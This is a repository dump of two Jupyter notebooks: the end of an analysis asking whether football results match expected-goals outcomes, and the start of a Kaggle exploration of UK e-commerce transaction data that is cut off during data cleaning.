| "
seasondateleagueteam1team2score1score2xg1xg2resultxg_result
1020162016-08-12French Ligue 1BastiaParis Saint-Germain0.01.00.970.632X
1120162016-08-12French Ligue 1AS MonacoGuingamp2.02.02.450.77X1
1220162016-08-13Barclays Premier LeagueHull CityLeicester City2.01.00.852.7712
1320162016-08-13Barclays Premier LeagueEvertonTottenham Hotspur1.01.00.731.11XX
1420162016-08-13Barclays Premier LeagueCrystal PalaceWest Bromwich Albion0.01.01.110.682X
\n", 483 | "
" 484 | ], 485 | "text/plain": [ 486 | " season date league team1 \\\n", 487 | "10 2016 2016-08-12 French Ligue 1 Bastia \n", 488 | "11 2016 2016-08-12 French Ligue 1 AS Monaco \n", 489 | "12 2016 2016-08-13 Barclays Premier League Hull City \n", 490 | "13 2016 2016-08-13 Barclays Premier League Everton \n", 491 | "14 2016 2016-08-13 Barclays Premier League Crystal Palace \n", 492 | "\n", 493 | " team2 score1 score2 xg1 xg2 result xg_result \n", 494 | "10 Paris Saint-Germain 0.0 1.0 0.97 0.63 2 X \n", 495 | "11 Guingamp 2.0 2.0 2.45 0.77 X 1 \n", 496 | "12 Leicester City 2.0 1.0 0.85 2.77 1 2 \n", 497 | "13 Tottenham Hotspur 1.0 1.0 0.73 1.11 X X \n", 498 | "14 West Bromwich Albion 0.0 1.0 1.11 0.68 2 X " 499 | ] 500 | }, 501 | "execution_count": 22, 502 | "metadata": {}, 503 | "output_type": "execute_result" 504 | } 505 | ], 506 | "source": [ 507 | "data.head()" 508 | ] 509 | }, 510 | { 511 | "cell_type": "markdown", 512 | "metadata": {}, 513 | "source": [ 514 | "If we go directly and ask a question \"How many games ended with the actual result distinct from the xG (expected) one?\", we find that this number is quite big - 14310 out of 29659" 515 | ] 516 | }, 517 | { 518 | "cell_type": "code", 519 | "execution_count": 26, 520 | "metadata": {}, 521 | "outputs": [ 522 | { 523 | "data": { 524 | "text/plain": [ 525 | "14310" 526 | ] 527 | }, 528 | "execution_count": 26, 529 | "metadata": {}, 530 | "output_type": "execute_result" 531 | } 532 | ], 533 | "source": [ 534 | "data[data['xg_result'] != data['result']].count()[0]" 535 | ] 536 | }, 537 | { 538 | "cell_type": "markdown", 539 | "metadata": {}, 540 | "source": [ 541 | "Or we can say that 48.25% of the games do not end up the same as it should (according to xG metric)" 542 | ] 543 | }, 544 | { 545 | "cell_type": "code", 546 | "execution_count": 31, 547 | "metadata": {}, 548 | "outputs": [ 549 | { 550 | "data": { 551 | "text/plain": [ 552 | "'48.25%'" 553 | ] 554 | }, 555 | "execution_count": 31, 556 | "metadata": {}, 557 | "output_type": "execute_result" 558 | } 559 | ], 560 | "source": [ 561 | "f\"{data[data['xg_result'] != data['result']].count()[0]/data.count()[0]*100:.2f}%\"" 562 | ] 563 | }, 564 | { 565 | "cell_type": "markdown", 566 | "metadata": {}, 567 | "source": [ 568 | "That seems quite unfair. But as we know there are 3 different outcomes in each football game: victory, draw and defeat. So let's compare how many times teams won and should have won, drew and should have drawn, lost and should have lost.\n", 569 | "\n", 570 | "To do this we will create an abstract dataset of results and xg_results and see how these two sets of values differ." 571 | ] 572 | }, 573 | { 574 | "cell_type": "code", 575 | "execution_count": 32, 576 | "metadata": {}, 577 | "outputs": [], 578 | "source": [ 579 | "results = data[['result', 'xg_result']]" 580 | ] 581 | }, 582 | { 583 | "cell_type": "code", 584 | "execution_count": 33, 585 | "metadata": {}, 586 | "outputs": [ 587 | { 588 | "data": { 589 | "text/plain": [ 590 | "1 12755\n", 591 | "X 9847\n", 592 | "2 7057\n", 593 | "Name: xg_result, dtype: int64" 594 | ] 595 | }, 596 | "execution_count": 33, 597 | "metadata": {}, 598 | "output_type": "execute_result" 599 | } 600 | ], 601 | "source": [ 602 | "results['xg_result'].value_counts()" 603 | ] 604 | }, 605 | { 606 | "cell_type": "code", 607 | "execution_count": 34, 608 | "metadata": {}, 609 | "outputs": [ 610 | { 611 | "data": { 612 | "text/plain": [ 613 | "1 13289\n", 614 | "2 8784\n", 615 | "X 7586\n", 616 | "Name: result, dtype: int64" 617 | ] 618 | }, 619 | "execution_count": 34, 620 | "metadata": {}, 621 | "output_type": "execute_result" 622 | } 623 | ], 624 | "source": [ 625 | "results['result'].value_counts()" 626 | ] 627 | }, 628 | { 629 | "cell_type": "markdown", 630 | "metadata": {}, 631 | "source": [ 632 | "And now let's put these values in a bar chart next to each other." 633 | ] 634 | }, 635 | { 636 | "cell_type": "code", 637 | "execution_count": 58, 638 | "metadata": {}, 639 | "outputs": [ 640 | { 641 | "data": { 642 | "text/plain": [ 643 | "" 644 | ] 645 | }, 646 | "execution_count": 58, 647 | "metadata": {}, 648 | "output_type": "execute_result" 649 | }, 650 | { 651 | "data": { 652 | "image/png": "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", 653 | "text/plain": [ 654 | "
" 655 | ] 656 | }, 657 | "metadata": { 658 | "needs_background": "light" 659 | }, 660 | "output_type": "display_data" 661 | } 662 | ], 663 | "source": [ 664 | "x = ['1', 'X', '2']\n", 665 | "scores = results['result'].value_counts().values\n", 666 | "xg_scores = results['xg_result'].value_counts().values\n", 667 | " \n", 668 | "X_axis = np.arange(len(x))\n", 669 | " \n", 670 | "plt.bar(X_axis - 0.2, scores, 0.4, label = 'Actual results', color='navy')\n", 671 | "plt.bar(X_axis + 0.2, xg_scores, 0.4, label = 'Expected results', color='orange')\n", 672 | "plt.xticks(np.arange(3), ['1', 'X', '2'])\n", 673 | "plt.legend()\n" 674 | ] 675 | }, 676 | { 677 | "cell_type": "markdown", 678 | "metadata": {}, 679 | "source": [ 680 | "And what we can see visually is that there is no such a huge difference between actual outcomes and expected ones. And if we put this into numbers we get:" 681 | ] 682 | }, 683 | { 684 | "cell_type": "code", 685 | "execution_count": 56, 686 | "metadata": {}, 687 | "outputs": [ 688 | { 689 | "name": "stdout", 690 | "output_type": "stream", 691 | "text": [ 692 | "1: 4.19%\n", 693 | "X: 10.80%\n", 694 | "2: 7.50%\n" 695 | ] 696 | } 697 | ], 698 | "source": [ 699 | "diffs = list(np.divide(scores, xg_scores))\n", 700 | "\n", 701 | "for diff in diffs:\n", 702 | " print(f'{x[diffs.index(diff)]}: {abs(1-diff)*100:.2f}%')" 703 | ] 704 | }, 705 | { 706 | "cell_type": "markdown", 707 | "metadata": {}, 708 | "source": [ 709 | "It means that when we compare the amount of games that ended up in the victory of home team in reality, we can see that this number differs from expected xG_result only in 4.19% of occasions, draws differ in 10.80% of occasions, and victories of away teams - in 7.5%. So, apparently, football IS fair?" 710 | ] 711 | }, 712 | { 713 | "cell_type": "markdown", 714 | "metadata": {}, 715 | "source": [ 716 | "## Conclusion\n", 717 | "\n", 718 | "I will be honest here, I've got a bit confused in the end and not sure if the steps I took are correct. I am not trying to manipulate data consciously, but maybe I am making an error by comparing the datapoints in a wrong way.\n", 719 | "\n", 720 | "Anyway, what my conclusion is the following: we can claim that football is quite fair game as stronger team usually wins against weaker one. And even though the actual results of every particular game might not correspond to the expected ones, on the global scale, when we talk big numbers, we can see that the distribution of real outcomes and expected ones are quite similar, therefore the conclusion that football is fair makes sense (taking into account our benchmark of 90% of same outcomes or 10% of different outcomes)" 721 | ] 722 | } 723 | ], 724 | "metadata": { 725 | "kernelspec": { 726 | "display_name": "Python 3.8.10 ('venv': venv)", 727 | "language": "python", 728 | "name": "python3" 729 | }, 730 | "language_info": { 731 | "codemirror_mode": { 732 | "name": "ipython", 733 | "version": 3 734 | }, 735 | "file_extension": ".py", 736 | "mimetype": "text/x-python", 737 | "name": "python", 738 | "nbconvert_exporter": "python", 739 | "pygments_lexer": "ipython3", 740 | "version": "3.8.10" 741 | }, 742 | "orig_nbformat": 4, 743 | "vscode": { 744 | "interpreter": { 745 | "hash": "439571daf87331876600085d8386dc908c3f950474647915ed4fb6541957308b" 746 | } 747 | } 748 | }, 749 | "nbformat": 4, 750 | "nbformat_minor": 2 751 | } 752 | -------------------------------------------------------------------------------- /E-Commerce_ Predicting Sales.ipynb: -------------------------------------------------------------------------------- 1 | {"cells":[{"metadata":{"id":"iInTqLqao6Pj","colab_type":"text"},"cell_type":"markdown","source":"We live in the world of e-commerce. We see tons of different stores here and there through the web. Internet made it possible to trade with anyone and everywhere. We can buy goods without leaving our house, we can compare prices in different stores within seconds, we can find what we really want and do not accept just the first more or less suitable offer. And I believe it would be really interesting to look at this world through the data it produces. That's why I decided to play around with e-commerce numbers and try to understand it better.\n\nThe data used in this analysis is taken from Kaggle dataset [\"E-Commerce Data | Actual transactions of UK retailer\"](https://www.kaggle.com/carrie1/ecommerce-data). \n\nThis is a transnational data set which contains all the transactions occurring between 01/12/2010 and 09/12/2011 for a UK-based and registered non-store online retail.The company mainly sells unique all-occasion gifts. Many customers of the company are wholesalers."},{"metadata":{},"cell_type":"markdown","source":"As always, we start our analysis by setting up our environment and by importing necessary libraries.\n\nWe import standard numpy and pandas to be able to perform analysis with Python, also we need data visualization libraries matplotlib and seaborn to output interesting visual findings, aaaaand some settings to make our kernel prettier."},{"metadata":{"id":"tII5uwykox0s","colab_type":"text"},"cell_type":"markdown","source":"# 1. Import libraries and data"},{"metadata":{"id":"YhbJLUN2an2n","colab_type":"code","colab":{},"trusted":true},"cell_type":"code","source":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\nimport warnings\nwarnings.filterwarnings('ignore')\n\nplt.style.use('fivethirtyeight')\n%matplotlib inline","execution_count":null,"outputs":[]},{"metadata":{},"cell_type":"markdown","source":"We import our data using *.read_csv()* method and we also add a parameter \"encoding='latin'\" as default encoding engine wasn't able to process this particular dataset. So next time you have difficulties importing data and everything seems to be correct and OK, check out encoding. That might save you some time of googling to try to understand what's wrong."},{"metadata":{"id":"MeUgjP_ga6z_","colab_type":"code","outputId":"cb557913-8c23-4c87-b116-4cb36d9359f2","colab":{"base_uri":"https://localhost:8080/","height":198},"trusted":true},"cell_type":"code","source":"# for Kaggle\ndf = pd.read_csv('/kaggle/input/ecommerce-data/data.csv', encoding='latin')\n# df = pd.read_csv('data.csv', encoding='latin')\ndf.head()","execution_count":null,"outputs":[]},{"metadata":{},"cell_type":"markdown","source":"Just by looking at first 5 rows of our table we can understand the structure and datatypes present in our dataset. We can notice that we will have to deal with timeseries data, integers and floats, categorical and text data."},{"metadata":{"id":"lqlGgcdiqAos","colab_type":"text"},"cell_type":"markdown","source":"# 2. Exploratory data analysis"},{"metadata":{},"cell_type":"markdown","source":"Every data science project starts with EDA as we have to understand what do we have to deal with. I divide EDA into 2 types: visual and numerical. Let's start with numerical as the simple pndas method *.describe()* gives us a lot of useful information."},{"metadata":{"id":"G0XGUAZFrk6v","colab_type":"text"},"cell_type":"markdown","source":"## 2.1. Quick statistical overview"},{"metadata":{"id":"pE4rxL-ZfwAe","colab_type":"code","outputId":"ef3791d5-e67f-4645-d52f-3ba4200d7fda","colab":{"base_uri":"https://localhost:8080/","height":288},"trusted":true},"cell_type":"code","source":"df.describe()","execution_count":null,"outputs":[]},{"metadata":{"id":"LOSySaN7qUdX","colab_type":"text"},"cell_type":"markdown","source":"Just a quick look at data with *.describe()* method gives us a lot of space to think. We see negative quantities and prices, we can see that not all records have CustomerID data, we can also see that the majority of transactions are for quantites from 3 to 10 items, majority of items have price up to 5 pounds and that we have a bunch of huge outliers we will have to deal with later."},{"metadata":{"id":"r_MIrqRYrqrG","colab_type":"text"},"cell_type":"markdown","source":"## 2.2. Dealing with types"},{"metadata":{},"cell_type":"markdown","source":"*.read_csv()* method performs basic type check, but it doesn't do that perfectly. That's why it is much better to deal with data types in our dataframe before any modifications to prevent additional difficulties. Every pandas dataframe has an attribute *.dtypes* which will help us understand what we currently have and what data has to be casted to correct types."},{"metadata":{"id":"XY4J_0KBqJGe","colab_type":"code","colab":{"base_uri":"https://localhost:8080/","height":181},"outputId":"a38be5ea-091e-4dc1-fb56-1b6b739e088e","trusted":true},"cell_type":"code","source":"df.dtypes","execution_count":null,"outputs":[]},{"metadata":{"id":"iRgA1W66rTtM","colab_type":"text"},"cell_type":"markdown","source":"If we have datetime data it's better to cast it to datetime type. We don't touch InvoiceNo for now as it seems like data in this column has not only numbers. (we saw just first 5 rows, while pandas during import scanned all the data and found that the type here is not numerical)."},{"metadata":{"id":"qQ6gDvmV8a69","colab_type":"code","colab":{},"trusted":true},"cell_type":"code","source":"df['InvoiceDate'] = pd.to_datetime(df['InvoiceDate'])\ndf = df.set_index('InvoiceDate')","execution_count":null,"outputs":[]},{"metadata":{"id":"UWSslxBNrgqG","colab_type":"text"},"cell_type":"markdown","source":"## 2.3. Dealing with null values"},{"metadata":{},"cell_type":"markdown","source":"Next and very important step is dealing with missing values. Normally if you encounter null values in the dataset you have to understand nature of those null values and possible impact they could have on the model. There are few strategies that we can use to fix our issue with null values: \n* delete rows with null values\n* delete the feature with null values\n* impute data with mean or median values or use another imputing strategy (method *.fillna()*)\n\nLet's check out what we have 